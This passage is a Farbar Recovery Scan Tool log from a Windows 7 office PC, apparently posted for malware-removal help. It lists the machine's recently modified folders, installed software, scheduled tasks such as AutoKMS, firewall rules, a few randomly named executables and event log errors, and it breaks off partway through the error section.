- 000000000 ____D C:\Windows\inf 2018-03-12 13:44 - 2016-10-28 09:03 - 000003490 _____ C:\Windows\System32\Tasks\AutoKMS 2018-03-12 13:43 - 2009-07-14 01:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2018-03-12 12:08 - 2016-06-30 12:07 - 000000000 ____D C:\Users\Beauty Exchange\Desktop\Office Forms 2018-03-12 10:36 - 2016-06-27 13:18 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#13 Document 2018-03-12 10:32 - 2016-06-27 13:13 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#5 Document 2018-03-08 17:35 - 2016-06-27 13:17 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#11 Document 2018-03-08 11:28 - 2016-07-19 15:32 - 000000000 ____D C:\Users\Beauty Exchange\Desktop\MY PERSONAL 2018-03-07 16:15 - 2017-11-30 17:32 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#18 Document 2018-03-07 13:40 - 2017-08-16 14:16 - 000000000 ____D C:\Users\Beauty Exchange\Desktop\Payroll By Week 2018-03-07 11:19 - 2016-06-27 13:14 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#6 Document 2018-03-06 15:32 - 2016-06-27 13:14 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#8 Document 2018-03-06 15:24 - 2016-06-27 13:14 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#7 Document 2018-03-06 14:55 - 2016-06-27 13:13 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#4 Document 2018-03-06 14:51 - 2016-06-27 13:10 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#3 Document 2018-03-06 14:43 - 2016-06-27 13:09 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#2 Document 2018-03-06 14:34 - 2017-02-15 15:30 - 000042992 _____ C:\Users\Beauty Exchange\Documents\SALON PAYROLL SHEET 2018.xlsx 2018-03-06 14:33 - 2016-06-27 13:08 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#1 Document 2018-03-06 12:52 - 2014-02-06 00:32 - 000000000 ____D C:\Program Files (x86)\Adobe 2018-03-06 10:38 - 2017-09-06 10:06 - 000000499 _____ C:\Users\Beauty Exchange\Desktop\Sign In.website 2018-03-02 12:36 - 2014-02-06 00:18 - 000000000 ____D C:\Users\Beauty Exchange\AppData\Local\Adobe 2018-03-02 12:35 - 2017-02-22 11:40 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task 2018-03-02 12:19 - 2016-03-24 17:10 - 000000000 ____D C:\Program Files (x86)\Raptr Inc 2018-03-02 04:28 - 2017-02-01 14:43 - 000000000 ___HT C:\Windows\wusa.lock 2018-03-02 04:28 - 2014-02-06 00:15 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2018-03-02 04:25 - 2014-02-06 00:14 - 000000000 ____D C:\Program Files (x86)\Microsoft Office 2018-03-01 13:23 - 2017-05-19 11:06 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#19 Document 2018-02-28 16:48 - 2016-06-27 13:16 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#10 Document 2018-02-28 11:32 - 2016-09-07 15:25 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#16 Document 2018-02-27 10:21 - 2014-02-06 00:17 - 000002224 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2018-02-27 10:21 - 2014-02-06 00:17 - 000002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2018-02-22 16:56 - 2017-03-28 10:41 - 000000000 ____D C:\Users\Beauty Exchange\Desktop\#9 Danny 2018-02-19 10:43 - 2015-05-15 15:46 - 000000000 ____D C:\Users\Guest\AppData\Roaming\Raptr 2018-02-14 10:37 - 2017-11-20 12:41 - 000000000 ____D C:\Users\Beauty Exchange\Documents\Canon Fax Data 2018-02-13 17:03 - 2009-07-14 01:32 - 000000000 ____D C:\Windows\system32\FxsTmp 2018-02-13 15:04 - 2017-04-04 13:50 - 000000000 ____D C:\Users\Beauty Exchange\Documents\Fax 2018-02-12 16:01 - 2017-03-27 10:38 - 000000000 ____D C:\Users\Beauty Exchange\Documents\OneNote Notebooks 2018-02-12 12:48 - 2016-06-27 13:16 - 000000000 ____D C:\Users\Beauty Exchange\Documents\#9 Document ==================== Files in the root of some directories ======= 2018-03-01 10:32 - 2018-03-01 10:32 - 000667136 _____ (Simple Kind) C:\Users\Beauty Exchange\AppData\Roaming\15b14147.exe 2018-03-01 10:32 - 2018-03-01 10:32 - 000667136 _____ (Simple Kind) C:\Users\Beauty Exchange\AppData\Roaming\4224ef6a.exe Some files in TEMP: ==================== 2018-03-01 10:57 - 2018-03-01 10:57 - 000577536 _____ (OrecX Thin) C:\Users\Beauty Exchange\AppData\Local\Temp\1403665.exe ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-09-07 09:45 ==================== End of FRST.txt =========== ADDITION.txt Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11.03.2018 01 Ran by Beauty Exchange (12-03-2018 14:23:52) Running from C:\Users\Beauty Exchange\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X4WUGCBP Windows 7 Ultimate Service Pack 1 (X64) (2014-02-06 04:03:07) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-890987734-199605990-4172685101-500 - Administrator - Disabled) Beauty Exchange (S-1-5-21-890987734-199605990-4172685101-1000 - Administrator - Enabled) => C:\Users\Beauty Exchange Guest (S-1-5-21-890987734-199605990-4172685101-501 - Limited - Enabled) => C:\Users\Guest QBDataServiceUser23 (S-1-5-21-890987734-199605990-4172685101-1002 - Limited - Enabled) => C:\Users\QBDataServiceUser23 ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.00 - Adobe Systems) Adobe Flash Player 28 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 28.0.0.161 - Adobe Systems Incorporated) AMD Catalyst Install Manager (HKLM\...\{B0B857B4-B5CD-7BBB-23FC-6FB64A8A1FD1}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.) App Manager - Dell C2665dnf (HKLM-x32\...\{B873FAEC-1627-4899-88C4-B8D0D0424F1D}) (Version: 1.00.000 - Dell Inc.) Brother MFL-Pro Suite MFC-7340 (HKLM-x32\...\{46E1B1F2-A279-4356-9B17-029F9CC72EAE}) (Version: 1.0.1.0 - Brother Industries, Ltd.) Canon Laser Printer/Scanner/Fax Extended Survey Program (HKLM\...\{8A16FF47-A5FC-49A8-96B5-31180D317059}) (Version: 2.0.6 - CANON INC.) Hidden Canon Laser Printer/Scanner/Fax Extended Survey Program (HKLM\...\Canon Laser Printer/Scanner/Fax Extended Survey Program) (Version: 2.0.6.10005 - CANON INC.) Canon MF Scan Utility (HKLM-x32\...\Canon_MF_Scan_Utility) (Version: 1.3.0.0 - CANON INC.) Canon MF731C/733C (HKLM\...\{28DD6D0E-A759-4A32-B9A8-0BC6EAB372A8}) (Version: 5.4.0.0 - CANON INC.) Citrix Online Launcher (HKLM-x32\...\{8A16C63D-027A-4645-B394-C033665D0195}) (Version: 1.0.325 - Citrix) Configuration Tool - Dell C2665dnf (HKLM-x32\...\{5AC049AB-E61B-45D4-A3DB-6A606FF38B90}) (Version: 1.00.000 - Dell Inc.) Dell C2665dnf Color MFP Address Book Editor Ver.1.0.0.0 (HKLM-x32\...\{723B61D6-A73A-4DB7-B8E1-E2D2F7DC58F2}) (Version: 1.0.0.0 - Dell Inc.) Dell C2665dnf Color MFP Scan Button Manager Ver.1.0.0.0 (HKLM-x32\...\{5C054E48-4070-4D22-BB5F-CC2294D76FD7}) (Version: 1.0.0.0 - Dell Inc.) Dell C2665dnf Color MFP Scanner Driver (HKLM-x32\...\{AF194BFC-5C05-4408-B2DF-5CF30BC556D2}) (Version: 1.1.0.0 - Dell Inc.) Dell Printer Software (HKLM-x32\...\{105F3CE5-FE55-408E-BF30-E78F85BA0B12}) (Version: 1.00.000 - Dell Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 64.0.3282.186 - Google Inc.) Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden Malwarebytes version 3.4.4.2398 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.4.2398 - Malwarebytes) Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation) Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.9029.2167 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-890987734-199605990-4172685101-1000\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) NETGEAR WNA3100 wireless USB 2.0 adapter (HKLM-x32\...\{C2425F91-1F7B-4037-9A05-9F290184798D}) (Version: 1.01.206 - NETGEAR) NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.57.35 - NVIDIA Corporation) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.9029.2167 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.9029.2167 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.9029.2167 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.9029.2167 - Microsoft Corporation) Hidden Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM-x32\...\{90150000-001F-040C-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden PowerISO (HKLM-x32\...\PowerISO) (Version: 5.8 - Power Software Ltd) QuickBooks (HKLM-x32\...\{31566BB1-C43D-4D96-9504-57E42B1FD86D}) (Version: 23.0.4001.2305 - Intuit Inc.) Hidden QuickBooks Enterprise Solutions: Accountant Edition 13.0 (HKLM-x32\...\{30823A86-D1BF-4D42-8E86-892F3D956254}) (Version: 23.0.4001.2305 - Intuit Inc.) Toner Status (HKLM-x32\...\{6E9A516A-6189-4502-80FD-51BE28989CEB}) (Version: 1.3.0.0 - CANON INC.) Workspace Desktop (HKU\S-1-5-21-890987734-199605990-4172685101-1000\...\workspacedesktop) (Version: - Starfield Technologies) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-890987734-199605990-4172685101-1000_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Beauty Exchange\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll () CustomCLSID: HKU\S-1-5-21-890987734-199605990-4172685101-1000_Classes\CLSID\{1BFB1268-6353-495A-AB78-97BF7CAB4D59}\InprocServer32 -> C:\Users\Beauty Exchange\AppData\Local\Workspace\gdeditwrapperax64.dll (Starfield Technologies) CustomCLSID: HKU\S-1-5-21-890987734-199605990-4172685101-1000_Classes\CLSID\{B5B8593C-89BC-44a7-BCE3-32FE4FED7C5C}\InprocServer32 -> C:\Users\Beauty Exchange\AppData\Local\Workspace\wbetoolsax64.dll (Starfield Technology, LLC) ShellIconOverlayIdentifiers: [off0] -> {8E33AEC3-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files (x86)\Workspace\offsyncext64.dll [2017-02-09] (Starfield Technologies, LLC) ShellIconOverlayIdentifiers: [off1] -> {8E33AEC4-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files (x86)\Workspace\offsyncext64.dll [2017-02-09] (Starfield Technologies, LLC) ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems Inc.) ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2013-12-16] (Power Software Ltd) ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2013-12-16] (Power Software Ltd) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2014-08-12] (Advanced Micro Devices, Inc.) ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems Inc.) ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2013-12-16] (Power Software Ltd) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {00E72EBA-DF0C-4CCB-AD75-178DA9ACE874} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-03-01] (Microsoft Corporation) Task: {0D52D023-F2DD-4079-AA77-D1DA564D5E94} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-02-06] () Task: {1AF420F1-2C37-43A4-B3AA-6617B6634580} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated) Task: {307D7C55-9C85-43AE-892E-6DC07B71CBBB} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2018-03-01] (Microsoft Corporation) Task: {4E42997C-69FA-43B5-9877-E1D9270F60F8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-02-22] (Microsoft Corporation) Task: {5501D7E5-7D34-4BEE-A485-0B12ECF75F52} - System32\Tasks\{18199DFC-AEAA-447F-92C1-06E60D638CEB} => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Task: {57369104-E58E-4282-B0AD-096CD5276AFC} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {6C04F400-30A3-4864-9A0F-AD16CB8E88BB} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-03-01] (Microsoft Corporation) Task: {8CB43446-8AA9-428E-9751-524E2A556D57} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {8E2377A9-FA9C-496F-BA43-4EC99CB57D30} - System32\Tasks\{5C185BC4-06C9-466A-8B6D-786D474531B4} => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Task: {A2458D2B-7E8F-4630-AF59-1280946DACF4} - System32\Tasks\{5D6D1740-3511-4852-A1C7-32BECC630251} => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Task: {CA7ED872-C67E-402F-83ED-2D6E6D0A89B3} - System32\Tasks\Canon\OIPPESP\Canon OIP Product Extended Survey Program => C:\Program Files\Canon\OIPPESP\Cnpspcnt.exe [2016-06-09] (CANON INC.) Task: {D339F89F-9E12-4095-BC92-16CAC1A67157} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-02-22] (Microsoft Corporation) Task: {DEE56423-EB69-42B6-9075-5EF6E38D0EC5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-06] (Adobe Systems Incorporated) Task: {E07FE3A1-72AE-41C7-AA96-7E805FD1FE38} - System32\Tasks\{F56A1271-D174-4ED3-9019-070A6F3E70ED} => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Task: {E7FD4982-4F21-4BD4-96F4-E6803FAA676C} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {F0DBBE9E-94D7-47FA-A4EA-ABFEEE60B9F5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.) Task: {FF8BA46C-2249-4C38-A846-17AC049B25E2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) ==================== Loaded Modules (Whitelisted) ============== 2014-02-06 12:27 - 2010-08-26 18:48 - 000285152 _____ () C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe 2017-02-01 14:44 - 2017-02-01 14:44 - 000959168 _____ () C:\Users\Beauty Exchange\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll 2014-02-06 12:27 - 2010-08-26 18:47 - 004577760 _____ () C:\Program Files (x86)\NETGEAR\WNA3100\WNA3100.exe 2014-08-12 11:06 - 2014-08-12 11:06 - 000102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll 2018-03-12 14:17 - 2018-02-05 15:44 - 002299168 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll 2018-03-12 14:17 - 2018-03-01 11:31 - 002488608 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll 2014-02-06 12:27 - 2010-07-09 17:38 - 000331776 _____ () C:\Program Files (x86)\NETGEAR\WNA3100\WifiLib.dll 2014-02-06 12:27 - 2010-02-03 12:31 - 000282624 _____ () C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvcLib.dll 2017-02-01 14:30 - 2018-03-01 16:45 - 001012400 _____ () C:\Program Files (x86)\Microsoft Office\Root\Office16\ADDINS\UmOutlookAddin.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sndappv2 => ""="service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 22:34 - 2009-06-10 17:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-890987734-199605990-4172685101-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Beauty Exchange\AppData\Roaming\Microsoft\Internet Explorer\Internet Explorer Wallpaper.bmp DNS Servers: 67.205.168.151 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Update Agent.lnk => C:\Windows\pss\QuickBooks Update Agent.lnk.CommonStartup MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Web Connector.lnk => C:\Windows\pss\QuickBooks Web Connector.lnk.CommonStartup MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks_Standard_21.lnk => C:\Windows\pss\QuickBooks_Standard_21.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^Beauty Exchange^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Send to OneNote.lnk => C:\Windows\pss\Send to OneNote.lnk.Startup MSCONFIG\startupreg: BrMfcWnd => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN MSCONFIG\startupreg: ControlCenter3 => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe /autorun MSCONFIG\startupreg: DLPSP => "C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\DLPSP.EXE" MSCONFIG\startupreg: DLQLU => "C:\Program Files\Dell Printers\Additional Color Laser Software\Launcher\DLQLU.EXE" /S ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [{425CB310-409A-4135-B0CE-040B12ABA48F}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{F55F366B-684A-418B-BA27-1906A767028C}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe FirewallRules: [{2A0D0239-7018-4AE3-8530-18F91726CC31}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [{904D3FB7-4FAE-47D5-A17B-C4354C209901}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe FirewallRules: [TCP Query User{EC89CDFE-F050-45E3-A472-969ADC3EB656}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [UDP Query User{1CBC0135-10CC-4139-ADF4-916FBAE180F5}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe FirewallRules: [{3C4B45F7-BCAE-404D-91EF-26B0957F0125}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe FirewallRules: [{3CF06724-F832-4D59-826F-90BA69386A1F}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe FirewallRules: [{7545DF13-0C8D-4DE1-967B-4F3F09A78861}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe FirewallRules: [{74836C3B-FBA9-48C3-B65D-794C7AC78735}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe FirewallRules: [{07BE2CF9-668E-4830-8479-104BD43EDB5A}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe FirewallRules: [{C3DFF8F6-89A9-4F29-9304-56FE0552BE51}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe FirewallRules: [{08683AFF-C203-49A8-BD7D-82A96FFF5653}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{DBBAD4FF-3A30-4630-93F1-EEB677659ABD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{FE57A986-8C84-4856-8298-32EE504D2546}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{48E9A2BE-6856-4F24-9722-3884AAC28D70}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [TCP Query User{E686F621-86B5-4452-A2C7-E67DB8C5F169}C:\users\beauty exchange\appdata\local\temp\igna70e.tmp\lmiignition.exe] => (Allow) C:\users\beauty exchange\appdata\local\temp\igna70e.tmp\lmiignition.exe FirewallRules: [UDP Query User{5F587471-FEB5-4795-82D0-11DA4656BEA7}C:\users\beauty exchange\appdata\local\temp\igna70e.tmp\lmiignition.exe] => (Allow) C:\users\beauty exchange\appdata\local\temp\igna70e.tmp\lmiignition.exe FirewallRules: [{A028D047-1B85-4DD4-9BCE-01E027C32B3C}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{0049DE10-41AE-49AC-AEF2-1BF628CFD455}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe FirewallRules: [{CFB730C8-3F32-4E81-80E4-BC0EB20FABB6}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{0AF3ACA2-1933-4E44-AA7D-874F65E9D390}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe FirewallRules: [{BE774B78-25DB-4347-BC20-7F5CB68013B0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe FirewallRules: [{ECB73631-974F-43A9-AE69-2A692EACE97A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Restore Points ========================= 21-09-2016 16:29:11 Installed Dell C2665dnf Color MFP Scan Driver 09-01-2017 15:07:33 Installed Dell C2665dnf Color MFP Scan Driver 02-03-2018 12:30:03 Removed Adobe Acrobat Reader DC. 05-03-2018 17:54:14 Removed Adobe Acrobat Reader DC. 06-03-2018 12:51:22 Removed Adobe Acrobat Reader DC. ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (03/12/2018 02:22:35 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 0x8007007f). Error: (03/12/2018 02:12:09 PM) (Source: Windows Search Service) (EventID: 3083) (User: ) Description: The protocol handler Mapi16 cannot be loaded. Error description: The specified procedure could not be found. (HRESULT : 